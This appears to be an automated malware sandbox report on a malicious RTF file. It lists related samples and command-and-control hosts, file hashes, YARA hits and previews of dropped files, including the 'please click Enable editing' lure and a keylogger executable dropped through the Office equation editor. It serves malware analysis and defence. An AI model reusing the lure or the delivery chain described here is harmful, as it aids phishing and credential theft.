  "reasons": "The provided screenshot does not contain any visually prominent buttons or links. The text in the screenshot appears to be a list of items or codes, and there is no language that creates a sense of urgency or interest. Additionally, there is no impersonation of well-known brands. Therefore, there is no indication that this document could mislead the user into clicking on a potentially harmful link."
}

                          Joe Sandbox View / Context

                          IPs

                          MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                          172.67.197.72LisectAVT_2403002B_80.exeGet hashmaliciousLokibotBrowse
                          • meridianresourcellc.top/document/five/fre.php
                          132.226.8.169SecuriteInfo.com.Exploit.CVE-2018-0798.4.16578.20925.rtfGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                          • checkip.dyndns.org/
                          SecuriteInfo.com.Trojan.PackedNET.2944.2376.13684.exeGet hashmaliciousSnake KeyloggerBrowse
                          • checkip.dyndns.org/
                          SecuriteInfo.com.Exploit.CVE-2017-11882.123.25886.26681.rtfGet hashmaliciousSnake KeyloggerBrowse
                          • checkip.dyndns.org/
                          kHeNppYRgN.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                          • checkip.dyndns.org/
                          Purchase Order - P04737.xlsGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                          • checkip.dyndns.org/
                          5RQ24SOW EPIRB_TOTAL Marine Services Ltd.exeGet hashmaliciousPureLog Stealer, Snake Keylogger, VIP KeyloggerBrowse
                          • checkip.dyndns.org/
                          DHL_497104908518.exeGet hashmaliciousSnake KeyloggerBrowse
                          • checkip.dyndns.org/
                          Tystnendes.exeGet hashmaliciousGuLoader, Snake KeyloggerBrowse
                          • checkip.dyndns.org/
                          25bbed456281ea6f37cb6b295ebd0d1764156e797b4f15e0dc1bbcd7342086a9_payload.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                          • checkip.dyndns.org/
                          Revised PI_2024.exeGet hashmaliciousGuLoader, Snake KeyloggerBrowse
                          • checkip.dyndns.org/
                          149.154.167.220VJV2AjJ7Na.exeGet hashmaliciousXWormBrowse
                            zx.ps1Get hashmaliciousUnknownBrowse
                              new order 00041221.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                7NeoZ6OBn2.exeGet hashmaliciousUnknownBrowse
                                  7NeoZ6OBn2.exeGet hashmaliciousUnknownBrowse
                                    file.exeGet hashmaliciousUnknownBrowse
                                      file.exeGet hashmaliciousUnknownBrowse
                                        file.exeGet hashmaliciousUnknownBrowse
                                          LisectAVT_2403002A_127.exeGet hashmaliciousAgentTeslaBrowse
                                            LisectAVT_2403002A_74.exeGet hashmaliciousAgentTeslaBrowse

                                              Domains

                                              MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                              reallyfreegeoip.orgSecuriteInfo.com.Win32.RATX-gen.20281.29649.exeGet hashmaliciousSnake KeyloggerBrowse
                                              • 188.114.97.3
                                              new order 00041221.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                              • 188.114.97.3
                                              New order.exeGet hashmaliciousSnake KeyloggerBrowse
                                              • 188.114.97.3
                                              New Order.exeGet hashmaliciousPureLog Stealer, Snake Keylogger, VIP KeyloggerBrowse
                                              • 188.114.96.3
                                              Payment_Advice.exeGet hashmaliciousGuLoader, Snake KeyloggerBrowse
                                              • 188.114.97.3
                                              LPO-9180155-PDF.exeGet hashmaliciousGuLoader, Snake KeyloggerBrowse
                                              • 188.114.97.3
                                              Apixaban - August 2024.exeGet hashmaliciousGuLoader, Snake KeyloggerBrowse
                                              • 188.114.96.3
                                              Payment Slip.exeGet hashmaliciousGuLoader, Snake KeyloggerBrowse
                                              • 188.114.97.3
                                              Torpernes.exeGet hashmaliciousGuLoader, Snake KeyloggerBrowse
                                              • 188.114.96.3
                                              Confirmation Order.jsGet hashmaliciousSnake KeyloggerBrowse
                                              • 188.114.97.3
                                              meridianresourcellc.topLisectAVT_2403002B_18.exeGet hashmaliciousLokibotBrowse
                                              • 104.21.52.88
                                              LisectAVT_2403002B_80.exeGet hashmaliciousLokibotBrowse
                                              • 172.67.197.72
                                              SecuriteInfo.com.Exploit.CVE-2018-0798.4.27057.11598.rtfGet hashmaliciousRemcosBrowse
                                              • 104.21.52.88
                                              th#U00f4ng s#U1ed1 k#U1ef9 thu#U1eadt.scr.exeGet hashmaliciousLokibotBrowse
                                              • 104.21.52.88
                                              checkip.dyndns.comSecuriteInfo.com.Win32.RATX-gen.20281.29649.exeGet hashmaliciousSnake KeyloggerBrowse
                                              • 158.101.44.242
                                              new order 00041221.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                              • 193.122.6.168
                                              New order.exeGet hashmaliciousSnake KeyloggerBrowse
                                              • 193.122.6.168
                                              New Order.exeGet hashmaliciousPureLog Stealer, Snake Keylogger, VIP KeyloggerBrowse
                                              • 193.122.130.0
                                              Payment_Advice.exeGet hashmaliciousGuLoader, Snake KeyloggerBrowse
                                              • 193.122.6.168
                                              LPO-9180155-PDF.exeGet hashmaliciousGuLoader, Snake KeyloggerBrowse
                                              • 132.226.247.73
                                              Apixaban - August 2024.exeGet hashmaliciousGuLoader, Snake KeyloggerBrowse
                                              • 193.122.6.168
                                              Payment Slip.exeGet hashmaliciousGuLoader, Snake KeyloggerBrowse
                                              • 193.122.6.168
                                              Torpernes.exeGet hashmaliciousGuLoader, Snake KeyloggerBrowse
                                              • 158.101.44.242
                                              Confirmation Order.jsGet hashmaliciousSnake KeyloggerBrowse
                                              • 132.226.247.73
                                              api.telegram.orgVJV2AjJ7Na.exeGet hashmaliciousXWormBrowse
                                              • 149.154.167.220
                                              zx.ps1Get hashmaliciousUnknownBrowse
                                              • 149.154.167.220
                                              new order 00041221.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                              • 149.154.167.220
                                              7NeoZ6OBn2.exeGet hashmaliciousUnknownBrowse
                                              • 149.154.167.220
                                              7NeoZ6OBn2.exeGet hashmaliciousUnknownBrowse
                                              • 149.154.167.220
                                              file.exeGet hashmaliciousUnknownBrowse
                                              • 149.154.167.220
                                              file.exeGet hashmaliciousUnknownBrowse
                                              • 149.154.167.220
                                              file.exeGet hashmaliciousUnknownBrowse
                                              • 149.154.167.220
                                              LisectAVT_2403002A_127.exeGet hashmaliciousAgentTeslaBrowse
                                              • 149.154.167.220
                                              LisectAVT_2403002A_74.exeGet hashmaliciousAgentTeslaBrowse
                                              • 149.154.167.220

                                              ASNs

                                              MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                              TELEGRAMRU8bZMO28ywp.exeGet hashmaliciousRedLineBrowse
                                              • 149.154.167.99
                                              VJV2AjJ7Na.exeGet hashmaliciousXWormBrowse
                                              • 149.154.167.220
                                              zx.ps1Get hashmaliciousUnknownBrowse
                                              • 149.154.167.220
                                              1lKbb2hF7fYToopfpmEvlyRN.exeGet hashmaliciousLummaC, VidarBrowse
                                              • 149.154.167.99
                                              new order 00041221.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                              • 149.154.167.220
                                              7NeoZ6OBn2.exeGet hashmaliciousUnknownBrowse
                                              • 149.154.167.220
                                              7NeoZ6OBn2.exeGet hashmaliciousUnknownBrowse
                                              • 149.154.167.220
                                              fps-booster.exeGet hashmaliciousStormKittyBrowse
                                              • 149.154.167.99
                                              file.exeGet hashmaliciousUnknownBrowse
                                              • 149.154.167.220
                                              file.exeGet hashmaliciousUnknownBrowse
                                              • 149.154.167.220
                                              CLOUDFLARENETUSo4iytkmhqh.exeGet hashmaliciousDCRat, PureLog Stealer, zgRATBrowse
                                              • 188.114.97.3
                                              setup.exeGet hashmaliciousMicroClipBrowse
                                              • 172.64.41.3
                                              PO#36463.3576e98f-8620-45d5-826b-6cdad93e0dbf.pdfGet hashmaliciousUnknownBrowse
                                              • 188.114.96.3
                                              setup.exeGet hashmaliciousMicroClipBrowse
                                              • 162.159.61.3
                                              file.exeGet hashmaliciousBabadedaBrowse
                                              • 172.64.41.3
                                              file.exeGet hashmaliciousBabadedaBrowse
                                              • 172.64.41.3
                                              http://DocSign.com-sigin@link.mail.beehiiv.com/ss/c/u001.6C5fb2jgNhK_7sih4vM3VZa9fE9tHBc9fWZLirgY7_MATRo7_qx7xDq5ZlnkMcO1QobynJ6PiItP4Wtcapt8tiaBcTbWM1w1MHuIiN_t_ffA_hJhmN8MgAW_Y4IPUoI1h738Lg4BNmL00CidixANpmMWuHYfF_cqfaxRK8lTMG1-wWhggG-d_C9QTaVWEbiJnLtTvYAHUheBKqEheltOyd97XuseNyZagdwHWCmhlkT7OlY8Lp8eVUjpaeMG7DI9deGuQGtHQPcQvFzkIQDa0a059V0CK-1cuy9eYoGUQgWNJ1TPUjC6FsPayH_g-TuOL3IqvHxaW2HwLWamtU9SbxCZfYmpyBNUtHDM0eWtV7pGx46kRVIH5Zs6e8rn0M4S/48d/73GSN9mjRhWrn93bto5IvA/h6/h001.m620eFbVsxMcJ4uiRyQ1LhT_dC1ms-gS22AQz8fYhEI#ANANT.GUPTA@AARCORP.COMGet hashmaliciousHTMLPhisherBrowse
                                              • 104.18.68.40
                                              Hollandco Company Guidelines Employee Handbook___fdp.docxGet hashmaliciousHTMLPhisher, Tycoon2FABrowse
                                              • 104.21.46.160
                                              Modrinth_Installer.exeGet hashmaliciousXWormBrowse
                                              • 104.18.23.35
                                              Account Statement #U2713 PC - ID 30781-20733-1691072748.htmGet hashmaliciousUnknownBrowse
                                              • 1.1.1.1
                                              CLOUDFLARENETUSo4iytkmhqh.exeGet hashmaliciousDCRat, PureLog Stealer, zgRATBrowse
                                              • 188.114.97.3
                                              setup.exeGet hashmaliciousMicroClipBrowse
                                              • 172.64.41.3
                                              PO#36463.3576e98f-8620-45d5-826b-6cdad93e0dbf.pdfGet hashmaliciousUnknownBrowse
                                              • 188.114.96.3
                                              setup.exeGet hashmaliciousMicroClipBrowse
                                              • 162.159.61.3
                                              file.exeGet hashmaliciousBabadedaBrowse
                                              • 172.64.41.3
                                              file.exeGet hashmaliciousBabadedaBrowse
                                              • 172.64.41.3
                                              http://DocSign.com-sigin@link.mail.beehiiv.com/ss/c/u001.6C5fb2jgNhK_7sih4vM3VZa9fE9tHBc9fWZLirgY7_MATRo7_qx7xDq5ZlnkMcO1QobynJ6PiItP4Wtcapt8tiaBcTbWM1w1MHuIiN_t_ffA_hJhmN8MgAW_Y4IPUoI1h738Lg4BNmL00CidixANpmMWuHYfF_cqfaxRK8lTMG1-wWhggG-d_C9QTaVWEbiJnLtTvYAHUheBKqEheltOyd97XuseNyZagdwHWCmhlkT7OlY8Lp8eVUjpaeMG7DI9deGuQGtHQPcQvFzkIQDa0a059V0CK-1cuy9eYoGUQgWNJ1TPUjC6FsPayH_g-TuOL3IqvHxaW2HwLWamtU9SbxCZfYmpyBNUtHDM0eWtV7pGx46kRVIH5Zs6e8rn0M4S/48d/73GSN9mjRhWrn93bto5IvA/h6/h001.m620eFbVsxMcJ4uiRyQ1LhT_dC1ms-gS22AQz8fYhEI#ANANT.GUPTA@AARCORP.COMGet hashmaliciousHTMLPhisherBrowse
                                              • 104.18.68.40
                                              Hollandco Company Guidelines Employee Handbook___fdp.docxGet hashmaliciousHTMLPhisher, Tycoon2FABrowse
                                              • 104.21.46.160
                                              Modrinth_Installer.exeGet hashmaliciousXWormBrowse
                                              • 104.18.23.35
                                              Account Statement #U2713 PC - ID 30781-20733-1691072748.htmGet hashmaliciousUnknownBrowse
                                              • 1.1.1.1
                                              UTMEMUSNew order.exeGet hashmaliciousSnake KeyloggerBrowse
                                              • 132.226.247.73
                                              LPO-9180155-PDF.exeGet hashmaliciousGuLoader, Snake KeyloggerBrowse
                                              • 132.226.247.73
                                              Confirmation Order.jsGet hashmaliciousSnake KeyloggerBrowse
                                              • 132.226.247.73
                                              Deye Union - PO # 23081377.exeGet hashmaliciousSnake KeyloggerBrowse
                                              • 132.226.247.73
                                              SecuriteInfo.com.Exploit.CVE-2018-0798.4.16578.20925.rtfGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                              • 132.226.247.73
                                              Purchase Order POT-247110.scr.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                              • 132.226.247.73
                                              SecuriteInfo.com.Trojan.PackedNET.2944.2376.13684.exeGet hashmaliciousSnake KeyloggerBrowse
                                              • 132.226.8.169
                                              SecuriteInfo.com.Exploit.CVE-2017-11882.123.25886.26681.rtfGet hashmaliciousSnake KeyloggerBrowse
                                              • 132.226.247.73
                                              Purchase Order.exeGet hashmaliciousDarkTortilla, Snake KeyloggerBrowse
                                              • 132.226.247.73
                                              yIRn1ZmsQF.elfGet hashmaliciousUnknownBrowse
                                              • 128.169.78.63

                                              JA3 Fingerprints

                                              MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                              05af1f5ca1b87cc9cc9b25185115607dpn24_065.docx.docGet hashmaliciousUnknownBrowse
                                              • 172.67.197.72
                                              • 188.114.97.3
                                              • 104.21.52.88
                                              waybill_shipping_documents_original_BL_CI&PL_26_07_2024_00000000_doc.xlsGet hashmaliciousGuLoader, RemcosBrowse
                                              • 172.67.197.72
                                              • 188.114.97.3
                                              • 104.21.52.88
                                              invoice.docx.docGet hashmaliciousFormBookBrowse
                                              • 172.67.197.72
                                              • 188.114.97.3
                                              • 104.21.52.88
                                              New order.exeGet hashmaliciousSnake KeyloggerBrowse
                                              • 172.67.197.72
                                              • 188.114.97.3
                                              • 104.21.52.88
                                              042240724.xlsGet hashmaliciousRemcosBrowse
                                              • 172.67.197.72
                                              • 188.114.97.3
                                              • 104.21.52.88
                                              SecuriteInfo.com.Exploit.CVE-2018-0798.4.16578.20925.rtfGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                              • 172.67.197.72
                                              • 188.114.97.3
                                              • 104.21.52.88
                                              SecuriteInfo.com.Exploit.CVE-2017-11882.123.25886.26681.rtfGet hashmaliciousSnake KeyloggerBrowse
                                              • 172.67.197.72
                                              • 188.114.97.3
                                              • 104.21.52.88
                                              dukas022.docx.docGet hashmaliciousUnknownBrowse
                                              • 172.67.197.72
                                              • 188.114.97.3
                                              • 104.21.52.88
                                              S004232824113048.xlsGet hashmaliciousRemcos, DBatLoaderBrowse
                                              • 172.67.197.72
                                              • 188.114.97.3
                                              • 104.21.52.88
                                              VERDACHT_New Order 8025047.docxGet hashmaliciousVIP KeyloggerBrowse
                                              • 172.67.197.72
                                              • 188.114.97.3
                                              • 104.21.52.88
                                              7dcce5b76c8b17472d024758970a406bpn24_065.docx.docGet hashmaliciousUnknownBrowse
                                              • 104.21.52.88
                                              waybill_shipping_documents_original_BL_CI&PL_26_07_2024_00000000_doc.xlsGet hashmaliciousGuLoader, RemcosBrowse
                                              • 104.21.52.88
                                              invoice.docx.docGet hashmaliciousFormBookBrowse
                                              • 104.21.52.88
                                              042240724.xlsGet hashmaliciousRemcosBrowse
                                              • 104.21.52.88
                                              Scan file.docGet hashmaliciousUnknownBrowse
                                              • 104.21.52.88
                                              fLnj4EeH6V.rtfGet hashmaliciousUnknownBrowse
                                              • 104.21.52.88
                                              SecuriteInfo.com.Exploit.CVE-2018-0798.4.16578.20925.rtfGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                              • 104.21.52.88
                                              DRAFT AWB and DRAFT Commercial invoice.xlsGet hashmaliciousRemcosBrowse
                                              • 104.21.52.88
                                              dukas022.docx.docGet hashmaliciousUnknownBrowse
                                              • 104.21.52.88
                                              S004232824113048.xlsGet hashmaliciousRemcos, DBatLoaderBrowse
                                              • 104.21.52.88
                                              36f7277af969a6947a61ae0b815907a1girlfrnd.docGet hashmaliciousGuLoader, RemcosBrowse
                                              • 149.154.167.220
                                              PRZELEW BANKOWY.xlsGet hashmaliciousUnknownBrowse
                                              • 149.154.167.220
                                              PRZELEW BANKOWY.xlsGet hashmaliciousUnknownBrowse
                                              • 149.154.167.220
                                              waybill_shipping_documents_original_BL_CI&PL_26_07_2024_00000000_doc.xlsGet hashmaliciousGuLoader, RemcosBrowse
                                              • 149.154.167.220
                                              2FBexXRCHR.rtfGet hashmaliciousAgentTeslaBrowse
                                              • 149.154.167.220
                                              042240724.xlsGet hashmaliciousRemcosBrowse
                                              • 149.154.167.220
                                              SecuriteInfo.com.Exploit.CVE-2018-0798.4.16578.20925.rtfGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                              • 149.154.167.220
                                              S004232824113048.xlsGet hashmaliciousRemcos, DBatLoaderBrowse
                                              • 149.154.167.220
                                              M6hS9qGbFx.rtfGet hashmaliciousAgentTeslaBrowse
                                              • 149.154.167.220
                                              DRWG-347RB1.pd.xlsGet hashmaliciousUnknownBrowse
                                              • 149.154.167.220

                                              Dropped Files

                                              No context

                                              Created / dropped Files

                                              C:\Users\user\AppData\Local\Microsoft\Office\14.0\OfficeFileCache\LocalCacheFileEditManager\FSD-CNRY.FSD (copy)

                                              Download File
                                              Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                                              File Type:data
                                              Category:dropped
                                              Size (bytes):131072
                                              Entropy (8bit):0.025564139045165832
                                              Encrypted:false
                                              SSDEEP:6:I3DPcjEHvxggLRxDsCY/l3RXv//4tfnRujlw//+GtluJ/eRuj:I3DPLFIRvYg3J/
                                              MD5:1DC466685469840300A494CD367B51A9
                                              SHA1:06DA5DCF5D3C315B65A92225E651BD052D8B365A
                                              SHA-256:4F940B9345C1494059A19CACDAC806388BA1AB1D5A994ECE8D186EF7DF18BF51
                                              SHA-512:9BF965C1C403BC6BC384549A695633C70F576976608E7D808A50F64380A5C1A13E72AE9646E21A6979667737182D97577BD33218CF71F24D2F5C35DA5FB397C3
                                              Malicious:false
                                              Reputation:low
                                              Preview:......M.eFy...zu...p..M......V*S,...X.F...Fa.q............................&r....oI.....D6..........b.6...L.C.;J.i......................................................................x...x...x...x...............................................................................................................................................................................................................................................................................................................................zV.......... ..@...................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                              C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

                                              Download File
                                              Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                              File Type:data
                                              Category:dropped
                                              Size (bytes):64
                                              Entropy (8bit):0.34726597513537405
                                              Encrypted:false
                                              SSDEEP:3:Nlll:Nll
                                              MD5:446DD1CF97EABA21CF14D03AEBC79F27
                                              SHA1:36E4CC7367E0C7B40F4A8ACE272941EA46373799
                                              SHA-256:A7DE5177C68A64BD48B36D49E2853799F4EBCFA8E4761F7CC472F333DC5F65CF
                                              SHA-512:A6D754709F30B122112AE30E5AB22486393C5021D33DA4D1304C061863D2E1E79E8AEB029CAE61261BB77D0E7BECD53A7B0106D6EA4368B4C302464E3D941CF7
                                              Malicious:false
                                              Reputation:high, very likely benign file
                                              Preview:@...e...........................................................

                                              C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\T4O403JZ\swagodi[1].doc

                                              Download File
                                              Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                                              File Type:Rich Text Format data, version 1
                                              Category:dropped
                                              Size (bytes):711568
                                              Entropy (8bit):4.106515155471183
                                              Encrypted:false
                                              SSDEEP:6144:j62W62W62W62W62W62W62W62W62W62W62W62W62W62W62W62W62W62W62W62W62I:K
                                              MD5:05E14A71757A27A508D0324732E006FE
                                              SHA1:54555F143881B2E53E44BC430BF709FC785F6BCF
                                              SHA-256:EEC7CF36EE9F2BB08B710C19227840D9FCB632C3DCCDF756D5A46CE194290469
                                              SHA-512:411E301FD70CCD8C16E2B85B37442387F9F3721A7BB24F236695DA95714C814A207F0D4AAA29B67ED594E8AAAEB13562922373AF7FC58622F33924371116878D
                                              Malicious:false
                                              Yara Hits:
                                              • Rule: INDICATOR_RTF_MalVer_Objects, Description: Detects RTF documents with non-standard version and embeding one of the object mostly observed in exploit documents., Source: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\T4O403JZ\swagodi[1].doc, Author: ditekSHen
                                              Preview:{\rtf1..{\*\uow9Bqc8PtXTP3i85Dr4RyUlnpM5Ni1L3cpeJawSatrQkWySqpR5AZOyS0IoURaNmtYpd0VKML7q}..{\825440998please click Enable editing from the yellow bar above.The independent auditors. opinion says the financial statements are fairly ...stated in accordance with the basis of accounting used by your organization. So why are the auditors giving you that other letter ...In an audit of financial statements, professional standards require that auditors obtain an understanding of internal controls to ...the extent necessary to plan the audit. Auditors use this understanding of internal controls to assess the risk of material ...misstatement of the financial statements and to design appropriate audit procedures to minimize that risk.The definition of good ...internal controls is that they allow errors and other misstatements to be prevented or detected and corrected by (the nonprofit.s) ...employees in the normal course of performing their duties. If the auditors detect an unexpected material mi

                                              C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\XNHC0JWC\swagodi[1].scr

                                              Download File
                                              Process:C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE
                                              File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                              Category:dropped
                                              Size (bytes):683016
                                              Entropy (8bit):7.9744561964387195
                                              Encrypted:false
                                              SSDEEP:12288:HsTnHaxBnGvHnutIognoP+wRYnS0qYVd1XXikKRj9l/klFck1zJstnkR:WaznWHfYFYnK8PXikKRnCc2dN
                                              MD5:C448536AEEA36B80A15D639E31C7B847
                                              SHA1:5225387E8D149E14A73F3D25A055B069750AEFCC
                                              SHA-256:490784A930FE7D630C926436C540441694C905A9CB1FE6B3C25D16C366D75492
                                              SHA-512:E51B95996A95C7FC9AE4206A76642D8C4B59062BB49BC54931BDC1FDA8A080F5F29451E71A3F63F2C3530D8D71B56F9E00482D38A6C645492932986523576F01
                                              Malicious:true
                                              Antivirus:
                                              • Antivirus: Joe Sandbox ML, Detection: 100%
                                              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...x..f..............0..*..........VI... ...`....@.. ....................................@..................................I..O....`...............6...6.........../..T............................................ ............... ..H............text...\)... ...*.................. ..`.rsrc........`.......,..............@..@.reloc...............4..............@..B................6I......H........B..D>.........................................................^..}.....(.......(.....*.0../........(...........s....o...........s.... ....o.....*..0............r...po......,..(...+...+....,....o.....+S.o............+7............(........( ..........,.........&........X.......i2...+..*......C.#f........{....*"..}....*....0..G.........(!.....,$........s".........%...P....(#...&+....-..+..($.....(%.....*..0..+.........,..{.......+....,...{....o&.......('....*..0......

                                              C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\9F4A4ED3.doc

                                              Download File
                                              Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                                              File Type:Rich Text Format data, version 1
                                              Category:dropped
                                              Size (bytes):711568
                                              Entropy (8bit):4.106515155471183
                                              Encrypted:false
                                              SSDEEP:6144:j62W62W62W62W62W62W62W62W62W62W62W62W62W62W62W62W62W62W62W62W62I:K
                                              MD5:05E14A71757A27A508D0324732E006FE
                                              SHA1:54555F143881B2E53E44BC430BF709FC785F6BCF
                                              SHA-256:EEC7CF36EE9F2BB08B710C19227840D9FCB632C3DCCDF756D5A46CE194290469
                                              SHA-512:411E301FD70CCD8C16E2B85B37442387F9F3721A7BB24F236695DA95714C814A207F0D4AAA29B67ED594E8AAAEB13562922373AF7FC58622F33924371116878D
                                              Malicious:false
                                              Yara Hits:
                                              • Rule: INDICATOR_RTF_MalVer_Objects, Description: Detects RTF documents with non-standard version and embeding one of the object mostly observed in exploit documents., Source: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\9F4A4ED3.doc, Author: ditekSHen
                                              Preview:{\rtf1..{\*\uow9Bqc8PtXTP3i85Dr4RyUlnpM5Ni1L3cpeJawSatrQkWySqpR5AZOyS0IoURaNmtYpd0VKML7q}..{\825440998please click Enable editing from the yellow bar above.The independent auditors. opinion says the financial statements are fairly ...stated in accordance with the basis of accounting used by your organization. So why are the auditors giving you that other letter ...In an audit of financial statements, professional standards require that auditors obtain an understanding of internal controls to ...the extent necessary to plan the audit. Auditors use this understanding of internal controls to assess the risk of material ...misstatement of the financial statements and to design appropriate audit procedures to minimize that risk.The definition of good ...internal controls is that they allow errors and other misstatements to be prevented or detected and corrected by (the nonprofit.s) ...employees in the normal course of performing their duties. If the auditors detect an unexpected material mi

                                              C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.Word\~WRF{1C83C99B-998E-4DEF-B324-E69763DD529E}.tmp

                                              Download File
                                              Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                                              File Type:Composite Document File V2 Document, Cannot read section info
                                              Category:dropped
                                              Size (bytes):5632
                                              Entropy (8bit):3.9477587075262717
                                              Encrypted:false
                                              SSDEEP:48:ru0MPeLdgMm1mPGZ4Qo9gGl7phLCKjGnh9m9/kB1Ye:hMPeLOMwKxQHUL10/myBW
                                              MD5:078789EA65682BBBEB17D2391C5AB0B9
                                              SHA1:268E4A02F102F2858C5C9E95B59E72B9891C972E
                                              SHA-256:9EEEBD03C0C88A6C0F997FE22E09DFCA0FE06B52647B9A88CA3590BE20ECEC55
                                              SHA-512:B0680AA9D84D0217A445721DC98D75A4D8DF94C144121437534CFB91045E3F7B1CF42D002584CCCE9054E7732871A1F0C16B46DE9AD965E3DE3518CCDB69C0BB
                                              Malicious:true
                                              Antivirus:
                                              • Antivirus: Avira, Detection: 100%
                                              Preview:......................>...............................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                              C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.Word\~WRS{33BDEDAF-FD20-43DA-A75E-5CAD44283C48}.tmp

                                              Download File
                                              Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                                              File Type:data
                                              Category:dropped
                                              Size (bytes):615936
                                              Entropy (8bit):3.4337341964764097
                                              Encrypted:false
                                              SSDEEP:6144:ryemryemryemryemryemryemryemryemryemryemryemryemryemryemryemryeq:l
                                              MD5:10F8EB237CA285E74732B15966D220CA
                                              SHA1:98F706ED47C1D50CA5AE7F898544227C55A9EC0A
                                              SHA-256:FC034C90EF1ABDFCB3C3604942A5DBA9E79829173E28EF8E240DB4738FECBA61
                                              SHA-512:3219BDCD44587E95B6DEF7951A5AF240F0E6A3E7946715321883F79B51720768E65A1E99DA62C62933FE0A9B95ECC83EA910DBEE4F63C3B86368F47C1F31976C
                                              Malicious:false
                                              Preview:2.5.4.4.0.9.9.8.p.l.e.a.s.e. .c.l.i.c.k. .E.n.a.b.l.e. .e.d.i.t.i.n.g. .f.r.o.m. .t.h.e. .y.e.l.l.o.w. .b.a.r. .a.b.o.v.e...T.h.e. .i.n.d.e.p.e.n.d.e.n.t. .a.u.d.i.t.o.r.s.. .o.p.i.n.i.o.n. .s.a.y.s. .t.h.e. .f.i.n.a.n.c.i.a.l. .s.t.a.t.e.m.e.n.t.s. .a.r.e. .f.a.i.r.l.y. .s.t.a.t.e.d. .i.n. .a.c.c.o.r.d.a.n.c.e. .w.i.t.h. .t.h.e. .b.a.s.i.s. .o.f. .a.c.c.o.u.n.t.i.n.g. .u.s.e.d. .b.y. .y.o.u.r. .o.r.g.a.n.i.z.a.t.i.o.n... .S.o. .w.h.y. .a.r.e. .t.h.e. .a.u.d.i.t.o.r.s. .g.i.v.i.n.g. .y.o.u. .t.h.a.t. .o.t.h.e.r. .l.e.t.t.e.r. .I.n. .a.n. .a.u.d.i.t. .o.f. .f.i.n.a.n.c.i.a.l. .s.t.a.t.e.m.e.n.t.s.,. .p.r.o.f.e.s.s.i.o.n.a.l. .s.t.a.n.d.a.r.d.s. .r.e.q.u.i.r.e. .t.h.a.t. .a.u.d.i.t.o.r.s. .o.b.t.a.i.n. .a.n. .u.n.d.e.r.s.t.a.n.d.i.n.g. .o.f. .i.n.t.e.r.n.a.l. .c.o.n.t.r.o.l.s. .t.o. .t.h.e. .e.x.t.e.n.t. .n.e.c.e.s.s.a.r.y. .t.o. .p.l.a.n. .t.h.e. .a.u.d.i.t... .A.u.d.i.t.o.r.s. .u.s.e. .t.h.i.s. .u.n.d.e.r.s.t.a.n.d.i.n.g. .o.f. .i.n.t.e.r.n.a.l. .c.o.n.t.r.o.l.s. .t.o. .a.s.s.e.s.s. .

                                              C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.Word\~WRS{4FA22C98-7DA0-493A-91D1-4967A9EB7810}.tmp

                                              Download File
                                              Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                                              File Type:data
                                              Category:dropped
                                              Size (bytes):1024
                                              Entropy (8bit):0.05390218305374581
                                              Encrypted:false
                                              SSDEEP:3:ol3lYdn:4Wn
                                              MD5:5D4D94EE7E06BBB0AF9584119797B23A
                                              SHA1:DBB111419C704F116EFA8E72471DD83E86E49677
                                              SHA-256:4826C0D860AF884D3343CA6460B0006A7A2CE7DBCCC4D743208585D997CC5FD1
                                              SHA-512:95F83AE84CAFCCED5EAF504546725C34D5F9710E5CA2D11761486970F2FBECCB25F9CF50BBFC272BD75E1A66A18B7783F09E1C1454AFDA519624BC2BB2F28BA4
                                              Malicious:false
                                              Preview:........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                              C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.Word\~WRS{BC768F9A-1E23-42EC-BFB7-497C7ADC86A6}.tmp

                                              Download File
                                              Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                                              File Type:data
                                              Category:dropped
                                              Size (bytes):1536
                                              Entropy (8bit):1.3568273340340578
                                              Encrypted:false
